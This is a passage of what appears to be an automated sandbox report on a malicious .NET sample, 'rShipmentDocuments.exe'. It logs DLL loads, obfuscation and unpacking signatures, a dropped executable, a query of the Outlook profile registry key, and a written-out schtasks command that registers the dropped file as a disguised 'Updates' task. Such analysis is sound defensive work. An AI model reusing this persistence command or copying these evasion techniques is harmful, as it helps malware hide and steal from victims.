Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: rShipmentDocuments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: rShipmentDocuments.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs .Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs .Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058D3243 pushad ; iretd 0_2_058D3249
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058D3F8B pushad ; retn 0582h 0_2_058D3F65
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9233 push es; ret 9_2_068F9244
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CE3248 pushad ; iretd 10_2_04CE3249
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C04E7 push ebp; ret 10_2_069C04E8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303EFDF push ds; retn 0005h 16_2_0303EFEA
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89241 push es; ret 16_2_06D89244
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D838AD push eax; retn 0005h 16_2_06D838B2
Source: rShipmentDocuments.exe Static PE information: section name: .text entropy: 7.843601109745972
Source: ZOlmYtPdlO.exe.0.dr Static PE information: section name: .text entropy: 7.843601109745972
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, sfMpDDrgl5tIjHCJHi.cs High entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, LGGmv9ymOKi5LCYbxd.cs High entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, zXKTFwNZqwSqRHqKqL.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs High entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, rrJmBaYMgAesC46HKX.cs High entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, K5wdDCoyqRME3lH5EU.cs High entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.cs High entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, tUWY54atKrJQlDpHvp.cs High entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, XVYEWIFWBiLsTMqJ21.cs High entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, Bw42dh4UebWEaNMXNVH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, s8ssFsqinUuXVMjTPg.cs High entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, syuYZq4btbLXi0a2KwI.cs High entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, qsHtpHimvnffligSo0.cs High entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ajBCZlS1bBb6GaZcdb.cs High entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, nSJmboJMlQX1MjvRbF.cs High entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, n1RHYrzOvkNoCypqxv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ej24U02jMkJFDYhhLB.cs High entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, yMxGlJ7yHLI4VmhwgP.cs High entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, EsoFSY1MObHNFvQ0yc.cs High entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, hdAVyr44GYdXRtyTuLG.cs High entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, z0u6FmON9MQ6CyDB1o.cs High entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, v2559Cskf3ytVZ5mSG.cs High entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WuxZfQxTK70JGtybAX.cs High entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, sfMpDDrgl5tIjHCJHi.cs High entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, LGGmv9ymOKi5LCYbxd.cs High entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, zXKTFwNZqwSqRHqKqL.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs High entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, rrJmBaYMgAesC46HKX.cs High entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, K5wdDCoyqRME3lH5EU.cs High entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.cs High entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, tUWY54atKrJQlDpHvp.cs High entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, XVYEWIFWBiLsTMqJ21.cs High entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, Bw42dh4UebWEaNMXNVH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, s8ssFsqinUuXVMjTPg.cs High entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, syuYZq4btbLXi0a2KwI.cs High entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, qsHtpHimvnffligSo0.cs High entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ajBCZlS1bBb6GaZcdb.cs High entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, nSJmboJMlQX1MjvRbF.cs High entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, n1RHYrzOvkNoCypqxv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ej24U02jMkJFDYhhLB.cs High entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, yMxGlJ7yHLI4VmhwgP.cs High entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, EsoFSY1MObHNFvQ0yc.cs High entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, hdAVyr44GYdXRtyTuLG.cs High entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, z0u6FmON9MQ6CyDB1o.cs High entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, v2559Cskf3ytVZ5mSG.cs High entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WuxZfQxTK70JGtybAX.cs High entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
Drops PE files
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
